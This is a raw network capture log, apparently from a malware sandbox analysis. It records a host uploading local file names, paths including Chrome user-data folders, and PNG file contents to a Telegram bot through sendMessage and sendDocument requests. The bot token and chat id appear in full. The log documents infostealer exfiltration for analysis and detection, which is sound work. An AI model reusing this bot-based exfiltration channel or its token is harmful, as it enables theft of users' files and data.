chat_id=1655240967&text=File%3A+192.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applica
2024-05-23 13:36:23 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:23 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
243	192.168.2.5	61299	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:22 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 246 Expect: 100-continue
2024-05-23 13:36:23 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:23 UTC	246	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 63 6f 72 65 5f 69 63 6f 6e 73 5f 5f 72 65 74 69 6e 61 5f 68 69 43 6f 6e 74 72 61 73 74 5f 77 6f 62 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 68 69 5f 63 6f 6e 74 72 61 73 74 25 35 43 63 6f 72 65 5f 69 63 6f 6e 73 5f 5f 72 65 74 69 6e 61 5f 68 69 43 6f 6e 74 72 61 73 74 5f 77 6f 62 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 34 33 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+core_icons__retina_hiContrast_wob.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Chi_contrast%5Ccore_icons__retina_hiContrast_wob.png%0ASize%3A+43+KB
2024-05-23 13:36:23 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:23 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
244	192.168.2.5	61300	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:23 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="02751a0b-43a0-4228-b250-5c660c3e58ca" Host: api.telegram.org Content-Length: 1553 Expect: 100-continue
2024-05-23 13:36:24 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:24 UTC	40	OUT	Data Raw: 2d 2d 30 32 37 35 31 61 30 62 2d 34 33 61 30 2d 34 32 32 38 2d 62 32 35 30 2d 35 63 36 36 30 63 33 65 35 38 63 61 0d 0a Data Ascii: --02751a0b-43a0-4228-b250-5c660c3e58ca
2024-05-23 13:36:24 UTC	93	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 31 39 32 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 31 39 32 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=192.png; filename*=utf-8''192.png
2024-05-23 13:36:24 UTC	1235	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c0 00 00 00 c0 08 06 00 00 00 52 dc 6c 07 00 00 04 9a 49 44 41 54 78 9c ed dd bf ab d5 75 1c c7 f1 f7 e7 28 2d d7 7e 0c 0d 06 12 12 2d 0d 51 fd 07 57 1c 15 1c 5a 1d da 6c 10 6c 88 40 0d 72 48 85 26 85 86 dc 1a 5a 83 02 1b c5 fb 27 14 04 2e 15 21 82 0d 0d 15 4a 50 7a 3e 2d 09 22 7a bd ea bd e7 f3 3d e7 f5 78 fc 05 2f b8 e7 79 3e f7 9e cf 97 73 ab 00 00 00 00 00 80 55 d5 46 0f d8 cc fa 99 bf 5e de f5 dc ec 50 ef ed 70 ab f9 be 5e 6d 6f 55 ed 1f bd 6b ca ae 5d ff f9 83 9b 97 de ba 38 7a c7 b2 98 64 00 eb 9f dd da 3b bb d3 4e 57 ef ef 57 d5 ee d1 7b 96 c9 b5 eb bf 54 55 17 c1 16 cd 46 0f 78 d0 81 b3 b7 0f cd fe ad 6b d5 fb f1 f2 e2 7f 4a ed c2 2b c7 7e 38 31 7a c5 32 98 54 00 07 cf de 3a d1 aa 7f 53 55 Data Ascii: PNGIHDRRlIDATxu(-~-QWZll@rH&Z'.!JPz>-"z=x/y>sUF^Pp^moUk]8zd;NWW{TUFxkJ+~81z2T:SU
2024-05-23 13:36:24 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 30 32 37 35 31 61 30 62 2d 34 33 61 30 2d 34 32 32 38 2d 62 32 35 30 2d 35 63 36 36 30 63 33 65 35 38 63 61 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --02751a0b-43a0-4228-b250-5c660c3e58caContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:36:24 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:36:24 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 30 32 37 35 31 61 30 62 2d 34 33 61 30 2d 34 32 32 38 2d 62 32 35 30 2d 35 63 36 36 30 63 33 65 35 38 63 61 2d 2d 0d 0a Data Ascii: --02751a0b-43a0-4228-b250-5c660c3e58ca--
2024-05-23 13:36:24 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:24 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
245	192.168.2.5	61301	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:24 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="04dab5fe-5091-494a-add1-e55b3a57bacb" Host: api.telegram.org Content-Length: 59057 Expect: 100-continue
2024-05-23 13:36:24 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:24 UTC	40	OUT	Data Raw: 2d 2d 30 34 64 61 62 35 66 65 2d 35 30 39 31 2d 34 39 34 61 2d 61 64 64 31 2d 65 35 35 62 33 61 35 37 62 61 63 62 0d 0a Data Ascii: --04dab5fe-5091-494a-add1-e55b3a57bacb
2024-05-23 13:36:24 UTC	151	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 62 39 39 31 37 38 62 61 39 39 36 64 32 62 34 61 32 35 35 62 30 66 31 36 33 64 63 62 38 38 63 65 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 62 39 39 31 37 38 62 61 39 39 36 64 32 62 34 61 32 35 35 62 30 66 31 36 33 64 63 62 38 38 63 65 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=b99178ba996d2b4a255b0f163dcb88ce.png; filename*=utf-8''b99178ba996d2b4a255b0f163dcb88ce.png
2024-05-23 13:36:24 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 0d 00 00 04 09 08 02 00 00 00 22 8e 66 ac 00 00 80 00 49 44 41 54 78 da ec bd 69 70 56 47 9a e7 eb 4f fd 65 66 be 74 cc c4 9d 1b 13 51 37 ba 63 ba 27 ba e3 56 74 4f 2f b7 a2 f7 e9 6d ba ba bb 5c e3 2e 17 ed 6a 97 cb 05 5d 14 50 36 50 a8 10 06 cc 22 c0 b2 8c d8 f7 1d cc be 59 12 66 13 62 07 21 b1 c9 92 10 8b 2c 04 02 a1 85 4d 48 08 21 84 80 2f f7 41 29 1e 27 99 e7 3d ef 79 5f 49 20 c1 ef 17 19 04 3a 6f 9e 3c b9 9d 3c cf 3f d7 37 46 fd f2 97 38 1c 0e 87 c3 e1 70 38 1c 0e 67 bb 37 c8 02 1c 0e 87 c3 e1 70 38 1c 0e 87 4e c0 e1 70 38 1c 0e 87 c3 e1 70 e8 04 1c 0e 87 c3 e1 70 38 1c 0e 87 4e c0 e1 70 38 1c 0e 87 c3 e1 70 dd ac 13 9e 00 00 00 00 00 c0 6b 06 3a 01 00 00 00 00 00 d0 09 00 00 00 00 00 80 4e 00 Data Ascii: PNGIHDR"fIDATxipVGOeftQ7c'VtO/m\.j]P6P"Yfb!,MH!/A)'=y_I :o<<?7F8p8g7p8Np8pp8Np8pk:N
2024-05-23 13:36:24 UTC	4096	OUT	Data Raw: 8c 4e 90 2a 6d 97 9d fd ea 89 07 51 41 fe 5e ae 5a 21 d1 09 00 00 80 4e 88 43 e0 b1 bb 43 87 0e f5 bb eb 44 24 04 1e 11 a5 b6 9a f3 ab bd f9 ba 92 91 91 f1 fe 33 c4 d4 b6 ed 3c c7 04 d9 b8 71 63 f4 54 38 eb 1d 07 0c 18 a0 87 27 18 5a 5a 5a 9c e8 85 ec 8b 3a 7e fc 78 5f 8a 38 33 52 74 d2 b9 6f 19 67 65 65 b9 95 60 d4 28 67 33 16 73 dd 3f f6 c1 c9 76 67 d6 f8 8b d1 09 5d 29 ca 6e d7 09 9a 57 86 69 d3 a6 d9 bf 66 67 67 3b 81 3b 67 72 c5 9a 45 16 52 79 e4 8d 70 3c 38 e7 15 a8 8d 1b 4b 27 34 35 35 39 73 8a e4 4f 7b 87 56 ff e0 b0 ee d2 09 13 27 4e 8c 3b 1a 23 a5 f9 be 85 39 f5 4f 8c 6c 27 3e fe 9e aa 7e 95 eb 2e 9d e0 4c 21 b3 8f 5b 36 38 f3 9d f4 4d 71 0e 63 f6 e3 e3 0b 0c 2d 5f 5f 27 c8 2b c3 17 0b 00 00 d0 09 4f 42 2c 33 7b 0a cd f2 e5 cb 77 ec d8 21 ff fa Data Ascii: N*mQA^Z!NCCD$3<qcT8'ZZZ:~x_83Rtogee`(g3s?vg])nWifgg;;grERyp<8K'4559sO{V'N;#9Ol'>~.L![68Mqc-__'+OB,3{w!
2024-05-23 13:36:24 UTC	4096	OUT	Data Raw: 26 b4 28 3a 41 da 1c 31 6d 43 52 64 db d3 2f 3e 92 62 fa c7 2a 77 fb e3 25 ef af 9d 0a a3 13 12 4a 5a 42 ed 52 a0 4e 90 c4 6a ff 8e 34 ec e1 e6 6c 12 cd ac b9 28 0a 67 cb 96 2d b6 37 f3 eb b9 73 e7 4c 7e fa 48 a2 44 47 39 11 70 5a 12 bb 5c 4c 6b 23 bf 46 7c 74 5e 5e 5e 60 50 82 d3 ed 12 fd dd 49 e8 2d eb 21 9d 70 a3 e9 81 0e 0e a4 6c 3c bb a3 b8 7e e3 f1 9a 7f 9a 7d a2 d3 e4 fd 30 b7 b9 b5 f3 73 ac 17 c5 d6 9f b6 ab f2 c0 b9 9b d9 a7 ea fe 34 a3 d3 dc 1f b2 a6 d4 b1 ad bf b1 a1 7f b1 5b 54 41 c9 d5 46 d5 09 6a d6 2f d8 7f 59 9e f8 c1 9a 33 1a 87 3d a5 d7 a3 e8 04 e3 fa 2d 3c bd e9 44 8d 44 e3 db 69 87 ed eb 12 d5 2f 4e d5 4a 50 12 2b 1d f7 f8 a6 99 3d 51 ab 3e 07 ae 2a 91 db 37 9f ac fd f1 92 22 bd 28 49 8b 9b 96 e8 f9 06 7d 46 27 4c 9f 3e dd 69 95 4e 9d Data Ascii: &(:A1mCRd/>bw%JZBRNj4l(g-7sL~HDG9pZ\Lk#F\|t^^^`PI-!pl<~}0s4[TAFj/Y3=-<DDi/NJP+=Q>7"(I}F'L>iN
2024-05-23 13:36:24 UTC	4096	OUT	Data Raw: 4b ed c8 91 23 f6 6c 96 44 8b 26 a1 06 47 7b 70 02 77 f1 52 bb 30 ae 09 ae cb 4b fc e1 20 9d 4e 99 b4 4e e8 ae 48 26 a7 13 12 4a 5a a2 ed 92 7f 7e 82 bc b3 ba b4 2c 70 63 ae 58 3a 21 62 33 1b 62 ac eb 2b 23 39 e9 57 4b f9 ac e8 e6 22 e6 d4 b3 92 92 12 1d 9d f6 07 5a 75 84 30 8a 4e d0 0e ac c0 69 87 12 73 53 c9 cd 52 fe e8 ef 4e 74 9f c9 eb 84 1f e7 ac ca af 8e e5 f6 96 3d 9d 33 73 f4 eb db 6a 1c af 2f bc 56 db d0 7a ab b9 4d 6c 6b 3d 7e 58 7c 8a b7 31 5b 3b 3b da 7f bc a4 e8 7a d3 83 f6 47 8f 2b af df 4b df 5e 61 4f d3 97 1b 7b bf 4e 10 3e f9 b2 42 93 bc f5 44 ed ed e6 b6 9b 77 db 56 e7 57 eb 09 0c 8b 9e 1d de 1c 92 96 88 f9 06 bd 5d 27 d8 fb 09 e8 d9 31 3e 3a 76 ac 73 1f a5 45 d3 a9 f3 8e 3d 24 86 82 7d 62 bc ce a4 d7 f1 77 69 e2 9b 9b 9b 03 bb 7c a2 8c Data Ascii: K#lD&G{pwR0K NNH&JZ~,pcX:!b3b+#9WK"Zu0NisSRNt=3sj/VzMlk=~X\|1[;;zG+K^aO{N>BDwVW]'1>:vsE=$}bwi\|
2024-05-23 13:36:24 UTC	4096	OUT	Data Raw: ca 6d 19 a0 56 fb 5b f3 3a 7b ee ff 69 f6 89 2f 8b ea 4e 5f 6e 5c 74 a0 ea 8d 01 db d5 67 88 4e e8 bf a2 d8 c4 27 7a 12 ea ee b4 9a 60 67 e7 5d a2 40 fb b0 4e 28 2f 2f 37 c6 e8 98 31 63 cc 95 f4 f4 74 73 65 f7 ee dd 41 ca ef b1 d8 d6 6f 06 21 6a c1 98 bc 8e 4e a8 aa aa 52 d3 dc 41 a7 39 c5 d5 09 f2 5c f1 f3 66 0c 52 53 53 db db bf 59 1f 13 b8 8e 59 4c ed c0 7b 45 24 18 c1 a3 39 20 bc f3 ce 3b 26 7a 99 99 99 81 77 6d df be dd 0e 5c 9e be 70 e1 c2 40 9f 12 b8 9d 1b 1b 37 6e 34 d7 25 e7 ed 6c 11 9d 90 50 1a 01 00 00 e0 d5 43 b4 81 31 df 07 ae fa 66 9f fa f7 96 16 19 b3 db 3e 73 60 ee be 4b e6 e2 aa fc e7 36 97 17 8b df d1 09 a5 57 3b 07 28 7e bc a4 c8 9e a6 50 7d fb be 2a 8d 10 9d f0 07 53 8e 9a 31 8a e8 a9 10 d1 62 82 dd 51 5c 4f 99 f6 61 9d 30 7d fa 74 63 Data Ascii: mV[:{i/N_n\tgN'z`g]@N(//71ctseAo!jNRA9\fRSSYYL{E$9 ;&zwm\p@7n4%lPC1f>s`K6W;(~P}*S1bQ\Oa0}tc
2024-05-23 13:36:24 UTC	4096	OUT	Data Raw: bf f3 ed 9f fc 62 a4 a4 42 ae fc c9 df 7c 37 64 e1 f2 ce 92 6a 1d 94 88 a2 13 44 8a 24 ba f2 41 4a 64 cf d9 60 9b 52 8a c9 ce fc 90 15 db b9 65 75 f2 dc 63 57 5b ba 32 14 b3 a3 e8 8a 2d a5 92 2b 9d c0 31 9c 58 ba 6b ff d7 b7 12 7a 84 54 9e c0 18 4a e4 e5 d1 51 aa 74 a2 4b 14 a2 48 85 20 91 50 d7 8d d1 e0 ab 0c 00 80 4e 40 27 f4 19 9d 70 f4 f2 dd 0d b9 f9 93 3e cd 1c 91 a2 0a 21 9e 54 48 49 99 be 60 79 5e 69 f5 cb 8a 73 ce 89 ca f7 3f 1c f5 eb ff f9 bf d8 46 f3 1f fe e9 5f a6 2f 5a 17 68 f0 8d cd 5c f4 e7 7f fb 4f ff e1 3f fe 27 e3 f3 bf fd 3f bf f1 c1 d8 74 31 01 7d 9d 30 74 5c c6 ff fb 07 ff 9f 98 e3 f2 ff e9 9f 67 ff d5 3f be 65 ee 92 7f ff f2 1f be bf e1 40 f1 53 eb f9 6a cb cf 53 d3 c4 9b 3e fa cf ff fe 7b ce a6 49 fd 87 8d d6 70 fc 90 67 ae dd fe 77 Data Ascii: bB\|7djD$AJd`ReucW[2-+1XkzTJQtKH PN@'p>!THI`y^is?F_/Zh\O?'?t1}0t\g?e@SjS>{Ipgw
2024-05-23 13:36:24 UTC	4096	OUT	Data Raw: a5 7d 9d 50 78 ed c1 4f 7e 31 32 56 0e 4b 50 4b b2 0f d9 e1 77 8b 4e d0 3d 49 7d 24 43 ec f8 17 74 8c 41 f5 90 4e 70 4e 4d f6 71 4e d1 ce 2d ab d3 03 25 7c 24 e1 b6 a8 78 e9 3a e1 c0 b9 fa 28 22 21 b6 54 a8 47 27 00 00 a0 13 d0 09 7d 43 27 1c fe fa 76 ea 47 a3 3f 1e 3f f1 d0 c5 06 b5 cb 73 8b af 8c 4c 1d 95 96 fe d9 b1 ab f7 9c b9 04 19 33 e7 9a ad 8a be 2c bc f0 4d 20 15 0d 4b d6 67 7f 73 6e da 67 d3 b2 8e 94 3a dd d5 6b b6 1f 1c 3d e6 63 f9 75 da dc 25 89 ae 7e 36 bb a0 6e ca 2b c8 9c 3d 7f dc b8 71 53 67 ce 5d bf f3 50 41 d0 a1 0a 09 b9 11 93 a6 3b b6 ef ff f8 f6 ff 5c f6 e5 51 7b f4 c0 de 0b f5 58 f5 fd 9f 7c 90 ea 2c 05 16 0b 6f 47 d1 15 33 33 de d6 09 62 38 f6 90 4e 08 09 59 75 82 3c 22 d6 1e a6 83 3f 9a e4 af 66 36 69 ff 78 fa 12 3f 4a df ac 41 2f Data Ascii: }PxO~12VKPKwN=I}$CtANpNMqN-%\|$x:("!TG'}C'vG??sL3,M Kgsng:k=cu%~6n+=qSg]PA;\Q{X\|,oG33b8NYu<"?f6ix?JA/
2024-05-23 13:36:24 UTC	4096	OUT	Data Raw: f2 84 09 13 34 9c 98 8e 8e 0e ab fb 25 e1 d8 74 bb 8e 9b 77 d0 e0 d0 a1 43 76 36 55 f7 d2 10 00 00 00 20 27 90 13 e2 e5 84 d7 4e cf 1c 1d 9d 5c 52 52 52 53 53 93 97 97 67 43 9c a5 c8 b6 2b a3 0d 43 4e e8 eb eb b3 51 13 12 00 64 b5 ab ab ab e5 79 8f 1c 39 62 79 60 fc f8 f1 6e 84 38 75 ea 94 bd 84 6d db b6 55 55 55 c9 fc 7b f6 ec b1 89 3a 08 1b 00 00 00 e4 04 72 42 d4 9c f0 ea d5 ab b5 6b d7 fe 3e 86 b1 63 c7 5e bb 76 cd 66 1e 86 9c 20 1e 3c 78 20 cf 1b 6b 95 24 b7 48 72 f0 16 92 9e 9e 1e 6b fe 39 73 e6 c4 3a 9b 13 00 00 00 c8 09 1f 7a 4e b0 fe 3c 5e 4e 50 57 ae 5c 99 32 65 8a 97 10 a4 b8 b7 23 09 51 72 c2 ea d5 ab 87 ea bc a8 2f 5f be 5c b7 6e 5d 30 21 6c d9 b2 a5 ad ad 2d f8 d4 f2 d8 dc dc 5c 2f 5d c8 fc 07 0e 1c 20 24 00 00 00 90 13 c8 09 ef e4 d5 ab 57 Data Ascii: 4%twCv6U 'N\RRRSSgC+CNQdy9by`n8umUUU{:rBk>c^vf <x k$Hrk9s:zN<^NPW\2e#Qr/_\n]0!l-\/] $W
2024-05-23 13:36:24 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:24 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
246	192.168.2.5	61302	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:24 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="1871a4ec-2cfd-4f86-a94b-62a3a4f2a9f1" Host: api.telegram.org Content-Length: 44784 Expect: 100-continue
2024-05-23 13:36:24 UTC	40	OUT	Data Raw: 2d 2d 31 38 37 31 61 34 65 63 2d 32 63 66 64 2d 34 66 38 36 2d 61 39 34 62 2d 36 32 61 33 61 34 66 32 61 39 66 31 0d 0a Data Ascii: --1871a4ec-2cfd-4f86-a94b-62a3a4f2a9f1
2024-05-23 13:36:24 UTC	153	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 63 6f 72 65 5f 69 63 6f 6e 73 5f 5f 72 65 74 69 6e 61 5f 68 69 43 6f 6e 74 72 61 73 74 5f 77 6f 62 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 63 6f 72 65 5f 69 63 6f 6e 73 5f 5f 72 65 74 69 6e 61 5f 68 69 43 6f 6e 74 72 61 73 74 5f 77 6f 62 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=core_icons__retina_hiContrast_wob.png; filename*=utf-8''core_icons__retina_hiContrast_wob.png
2024-05-23 13:36:24 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 78 00 00 02 58 08 06 00 00 00 d8 00 8e 8f 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 0a eb 00 00 0a eb 01 82 8b 0d 5a 00 00 00 1c 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 46 69 72 65 77 6f 72 6b 73 20 43 53 36 e8 bc b2 8c 00 00 00 15 74 45 58 74 43 72 65 61 74 69 6f 6e 20 54 69 6d 65 00 34 2f 32 37 2f 31 32 fd 22 3d ed 00 00 20 00 49 44 41 54 78 9c ec dd 4d 6f 24 49 7e e7 f9 bf d5 f6 6a 35 bb da 2e b1 34 68 ec b1 c1 7a 01 6a 80 f9 02 2a 81 4c ec 2b 20 85 c1 40 80 74 61 5e 75 63 de d4 47 e6 4b 60 5e aa 85 c6 60 b0 e4 9e 17 bb 20 01 ea 05 90 e8 d2 0b 20 5f c0 40 cd e8 07 61 a4 99 69 f4 6f 0f e6 9e f4 70 37 7f 0c f3 70 b3 f0 ef 07 08 54 16 19 e1 e1 74 Data Ascii: PNGIHDRxXsBIT\|dpHYsZtEXtSoftwareAdobe Fireworks CS6tEXtCreation Time4/27/12"= IDATxMo$I~j5.4hzj*L+ @ta^ucGK`^` _@aiop7pTt
2024-05-23 13:36:24 UTC	4096	OUT	Data Raw: e8 b3 c9 2b b3 83 b2 18 6a db 74 54 80 aa f0 2d 50 5d 46 1f 0c a8 76 e2 39 ee af cb 8f c2 75 95 66 fb 5c aa 79 80 c0 6d 39 11 28 dc 41 b7 5e e4 50 38 68 4f f6 82 86 12 3c 21 44 3a 02 9f e5 50 89 80 50 a8 58 37 28 4c ac 3f 61 3f 7f 65 ba 86 6c ff c0 6b a2 b5 47 df fa c4 f9 2b 0f 97 3a ea 1b 6b e0 c4 76 88 e7 d0 db 43 09 f6 e7 f2 61 e2 4b 65 9f 13 9c fc 39 f0 ba 50 5b 31 af 44 04 0a 1f a7 8e 1e 15 ad f0 60 86 e8 e7 f4 87 4e e1 8b b0 b1 90 67 8d d4 d2 1e a3 2f 5c 28 3c c9 f6 91 12 08 71 bb 1e 39 05 bc e5 e8 dd be c0 e3 9d bd 8e e4 7d 32 b3 d3 e2 67 e7 66 76 69 7e 74 ef 43 f1 bb f2 71 5b fc 6e b5 3b b4 fa 27 77 ec f3 15 79 e7 a3 e2 a0 20 e6 32 73 50 db a6 a3 ae 70 ab 39 0a eb 49 db 27 80 e5 95 f7 aa 87 31 6d a7 5a 00 39 fe 2f cc 8f f6 34 c1 9c c2 07 6b 5c 45 Data Ascii: +jtT-P]Fv9uf\ym9(A^P8hO<!D:PPX7(L?a?elkG+:kvCaKe9P[1D`Ng/\(<q9}2gfvi~tCq[n;'wy 2sPp9I'1mZ9/4k\E
2024-05-23 13:36:24 UTC	4096	OUT	Data Raw: 2c f2 f9 6d 06 ce 66 fe bb b4 97 91 8a 8b 9f 10 de 7f 09 30 e6 1a e1 3e d6 b3 99 7d d8 d7 f6 4f 4d 20 e0 dd 29 f8 d8 65 64 67 71 82 79 6d db fb 3a 42 5e 33 93 f4 64 db df 99 37 73 6f 93 e2 4e ac ea be f3 d9 39 f7 ed 9c ef 99 8b 40 e0 be f3 e4 80 81 8b 1c 07 13 44 2e a5 25 4c 3c 98 cf f1 e2 fd f9 f8 e5 0e 09 77 4b 84 bc 7b 44 c0 0b 34 15 fd 72 99 85 d4 33 94 8d f9 73 fc cf a1 fe 9f 80 77 62 07 32 73 b8 5b 22 e4 1d 68 e6 70 b7 44 c8 3b d6 7d b0 64 c0 ab d9 80 99 00 00 20 00 49 44 41 54 c6 7c b9 85 fe 51 a0 ed 81 cc 8d bd e5 bb 51 17 08 4c 76 1e 69 15 da d7 39 86 4a 0e 77 1f 1c 55 bd ff cf 6f 78 3d f6 5a f6 64 f1 13 c2 fb 46 30 92 82 bd d5 40 4e 4d 7d 7f b5 f4 7e 85 90 37 2c 70 e1 70 f6 89 e8 02 27 fc 5c 58 2c 04 02 5e b3 1d 42 de b6 11 ec 04 bc d3 75 d4 f7 Data Ascii: ,mf0>}OM )edgqym:B^3d7soN9@D.%L<wK{D4r3swb2s["hpD;}d IDAT\|QQLvi9JwUox=ZdF0@NM}~7,pp'\X,^Bu
2024-05-23 13:36:24 UTC	4096	OUT	Data Raw: b7 44 c8 1b 1f 21 2f d0 ae 23 e4 0d de c5 47 b8 8b 35 29 3e d3 31 82 d9 b3 9c 06 84 26 11 f0 16 1b ac 6b a3 9d 98 0f 12 1f ac 7d 46 f9 aa f3 e2 b9 b7 d6 3d 0a f2 b9 5e 6e 00 5f 3a 8b ae d1 99 a7 36 6c fb 96 2e cc ec c9 9a b7 82 d4 dd e5 f4 e5 99 49 fd ef ef 0b c4 bd 7f f9 b7 37 f6 cf bf bf b3 7f fe fd 9d fd e6 bf be e9 7d fe ef fe f5 8d fd 97 df dd d8 3f ff fe ce 7e f7 af fd cf f7 ea 17 4b d6 de 56 d1 14 23 6d ab fb b6 0f 2d b7 49 5f 99 ff 0e 05 c3 93 e2 fb 53 0d 68 de 31 8a 17 40 9f a2 fc 0b 77 65 ec df 92 23 78 51 51 0c 5a 98 1c ee 96 7a 42 de 61 17 ed b1 a5 25 c4 3a 32 42 5e a0 ed fb 71 65 e1 01 71 57 46 b8 8b 15 29 ce 8d 87 ce 03 55 57 96 4a cc aa 26 75 12 01 6f a1 be 63 3a d4 f7 cc 05 ed b1 8c 1b db 3e 31 7b 67 f7 ea 0f 79 ff fa 2f fc a8 dd d3 1f bf Data Ascii: D!/#G5)>1&k}F=^n_:6l.I7}?~KV#m-I_Sh1@we#xQQZzBa%:2B^qeqWF)UWJ&uoc:>1{gy/
